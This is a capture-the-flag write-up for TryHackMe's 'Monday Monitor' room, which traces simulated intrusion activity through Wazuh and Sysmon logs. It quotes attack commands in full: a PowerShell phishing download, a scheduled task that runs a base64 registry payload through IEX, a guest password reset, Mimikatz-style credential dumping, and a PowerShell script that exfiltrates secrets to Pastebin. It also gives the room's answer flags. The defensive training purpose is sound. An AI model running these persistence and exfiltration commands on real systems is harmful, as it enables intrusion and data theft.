> For the complete documentation index, see [llms.txt](https://writeupsifelix.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://writeupsifelix.gitbook.io/writeups/monday-monitor-thm.md).

# Monday Monitor - THM

***

## Tags

[Endpoint Security Monitoring](/writeups/tags/endpoint-security-monitoring.md)

## Tools&#x20;

[Wazuh](https://wazuh.com/), [Sysmon](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon)

## Scenario

Swiftspend Finance, the coolest fintech company in town, is on a mission to level up its cyber security game to keep those digital adversaries at bay and ensure their customers stay safe and sound.

Led by the tech-savvy Senior Security Engineer John Sterling, Swiftspend's latest project is about beefing up their endpoint monitoring using Wazuh and Sysmon. They've been running some tests to see how well their cyber guardians can sniff out trouble. And guess what? You're the cyber sleuth they've called in to crack the code!

The tests were run on Apr 29, 2024, between 12:00:00 and 20:00:00. As you dive into the logs, you'll look for any suspicious process shenanigans or weird network connections, you name it! Your mission? Unravel the mysteries within the logs and dish out some epic insights to fine-tune Swiftspend's defences.

***

## Tasks

<mark style="color:yellow;">**`1. Initial access was established using a downloaded file. What is the file name saved on the host?`**</mark>

We begin by opening Wazuh and navigating to the security events module.&#x20;

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2FCIJzQpmAJcEKKkdZylRK%2Fimage.png?alt=media&amp;token=8d76edd0-2d71-4fd2-a938-8cbd52d8cede" alt=""><figcaption></figcaption></figure>

Then, we adjust the date to April 29, 2024, between 12:00:00 and 20:00:00, as specified in the scenario. This helps us narrow down the relevant events.

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2F6XzJe2ydmNPZ7tqEtdGe%2Fimage.png?alt=media&amp;token=8833e5b2-8a60-4edb-9bbd-058c09be729c" alt=""><figcaption></figcaption></figure>

Next, we streamline our view by removing unnecessary columns and adding `data.win.eventdata.commandLine` as a column. This allows us to easily see the commands executed during this timeframe.&#x20;

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2FKwMhImTyRPCn8MjxGcxp%2Fimage.png?alt=media&amp;token=cc041983-cc70-47f0-88eb-f6d503ebea75" alt=""><figcaption></figcaption></figure>

To locate the downloaded file, we apply the “http” filter in the Wazuh search bar. This method yields three hits, one of which stands out.

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2FiuQiRarXt8H02YXy58Xs%2Fimage.png?alt=media&amp;token=59949007-e0ab-420f-a032-18bf5b472b56" alt=""><figcaption></figcaption></figure>

This command indicates that a PowerShell script was used to download a file from `http://localhost/SwiftSpend_Financial_Expenses.xlsm` and save it as `PhishingAttachment.xlsm` in the temporary directory.&#x20;

The original file name, `SwiftSpend_Financial_Expenses.xlsm`, is crucial because it reveals the nature of the file and its potential use in the phishing attack. Thus, the file name saved on the host is `SwiftSpend_Financial_Expenses.xlsm`.

{% hint style="success" %}
SwiftSpend\_Financial\_Expenses.xlsm
{% endhint %}

***

<mark style="color:yellow;">**`2. What is the full command run to create a scheduled task?`**</mark>

&#x20;First, as the task progresses, we add additional columns to show more data, specifically `data.win.eventdata.image` and `data.win.eventdata.parentImage`

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2FTd2OQtTP90MzpLpjt3ya%2Fimage.png?alt=media&amp;token=088e12e9-63e7-4b32-980a-a47dde713b6e" alt=""><figcaption></figcaption></figure>

Next, the process commonly associated with scheduled task creation is `schtasks.exe`. To filter our data effectively, we enter `*schtasks*` into the search bar.&#x20;

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2FqfyfJ9HnzjAaQkGBM4nF%2Fimage.png?alt=media&amp;token=893ca8cb-a289-4e8c-9021-68f2a7a4857a" alt=""><figcaption></figcaption></figure>

By examining the filtered output, we successfully identify the full command used to create the scheduled task.&#x20;

{% hint style="success" %}
"cmd.exe" /c "reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG\_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \\"\\" powershell.exe -Command IEX(\[System.Text.Encoding]::ASCII.GetString(\[System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\SOFTWARE\\\ATOMIC-T1053.005).test)))" /sc daily /st 12:34"
{% endhint %}

***

<mark style="color:yellow;">**`3. What time is the scheduled task meant to run?`**</mark>

We can find the information by examining the previously found command to create scheduled task

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2FTlCUOsz0JdOkfyjfqLek%2Fimage.png?alt=media&amp;token=a0a902e9-40db-4fe5-8180-942eb1a8d83c" alt=""><figcaption></figcaption></figure>

{% hint style="success" %}
12:34
{% endhint %}

***

<mark style="color:yellow;">**`4. What was encoded?`**</mark>

We start by examining the command, which clearly indicates that it uses base64 to encode the content.&#x20;

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2F4JLPE1Bp5Oipe5Rspjzf%2Fimage.png?alt=media&amp;token=c9ac851a-154b-4a9c-855d-13d1f83edce7" alt=""><figcaption></figcaption></figure>

To decode this, we head over to [CyberChef](https://cyberchef.org/). Once there, we select the “From Base64” operation. We then input the base64 code into the designated area.&#x20;

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2FQr44sprDqBnCdEndzUS9%2Fimage.png?alt=media&amp;token=b1ccb5e6-0934-4c25-96cd-c468f2b74e0f" alt=""><figcaption></figcaption></figure>

The output is promptly displayed, revealing the command `ping www.youarevulnerable.thm`.&#x20;

{% hint style="success" %}
ping [www.youarevulnerable.thm](http://www.youarevulnerable.thm)
{% endhint %}

***

<mark style="color:yellow;">**`5. What password was set for the new user account?`**</mark>

When we need to determine the password set for a new user account, we start by identifying the processes that typically indicate new user account creation, which are `net.exe` and `net1.exe`.&#x20;

To filter these processes, we enter “net” into the search bar.&#x20;

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2FW402KAei9XKZ87WkquH9%2Fimage.png?alt=media&amp;token=26f09002-8a04-4f58-9eaa-55926eed1a3d" alt=""><figcaption></figcaption></figure>

From the output, we receive a few hits, but one command stands out: `"C:\\Windows\\system32\\net.exe" user guest I_AM_M0NIT0R1NG`.&#x20;

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2F35HGW2zNHcEFiNIQYByO%2Fimage.png?alt=media&amp;token=f3d05ee5-df55-4793-87bc-48fd16709c4c" alt=""><figcaption></figcaption></figure>

The command reveals that the password set for the new user account is `I_AM_M0NIT0R1NG`.

{% hint style="success" %}
I\_AM\_M0NIT0R1NG
{% endhint %}

***

<mark style="color:yellow;">**`6. What is the name of the .exe that was used to dump credentials?`**</mark>

To identify the name of the .exe used to dump credentials, we start by recognizing that adversaries commonly use a tool called Mimikatz for this purpose.&#x20;

We proceed by entering "mimikatz" into the search bar to filter events related to this tool.&#x20;

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2FzBHzbzX10L9KxW3jOLp3%2Fimage.png?alt=media&amp;token=f268144f-7be4-419c-9479-d2b5a41cf9b2" alt=""><figcaption></figcaption></figure>

Upon filtering, we receive four hits. By examining one of the event commands, we can definitively identify a credential dump attempt, as indicated by the highlighted command in the image.&#x20;

Therefore, the .exe used in this instance is memotech.exe.

{% hint style="success" %}
memotech.exe
{% endhint %}

***

<mark style="color:yellow;">**`7. Data was exfiltrated from the host. What was the flag that was part of the data?`**</mark>

We begin by recognizing that adversaries have various methods to exfiltrate data, one of which is using the HTTP POST method.&#x20;

To identify events related to this method, we filter the keyword “Post” in the search bar. This filtering yields a single hit.

<figure><img src="https://1608344315-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuQAhC0bSSjPd5WFAfdYq%2Fuploads%2FSDouatvh9POqBBqv1xh1%2Fimage.png?alt=media&amp;token=a8449696-6e0d-448c-b0df-3a3fc6f57ea6" alt=""><figcaption></figcaption></figure>

The command identified in the event is:

{% code overflow="wrap" %}

```powershell
"powershell.exe" & {$apiKey = "6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0" $content = "secrets, api keys, passwords, THM{M0N1T0R_1$_1N_3FF3CT}, confidential, private, wall, redeem..." $url = "https://pastebin.com/api/api_post.php" $postData = @{ api_dev_key = $apiKey api_option = "paste" api_paste_code = $content } $response = Invoke-RestMethod -Uri $url -Method Post -Body $postData Write-Host "Your paste URL: $response"}
```

{% endcode %}

This command uses PowerShell to exfiltrate data. It sets an API key and content, which includes sensitive information such as secrets, API keys, passwords, and the flag

The command then sends this data to Pastebin using an HTTP POST request. The `Invoke-RestMethod` cmdlet is used to make the POST request, and the response, which is the URL of the paste, is displayed.

Based on the command, we identify that the flag exfiltrated as part of the data is THM{M0N1T0R\_1$\_1N\_3FF3CT}.

{% hint style="success" %}
THM{M0N1T0R\_1$\_1N\_3FF3CT}
{% endhint %}
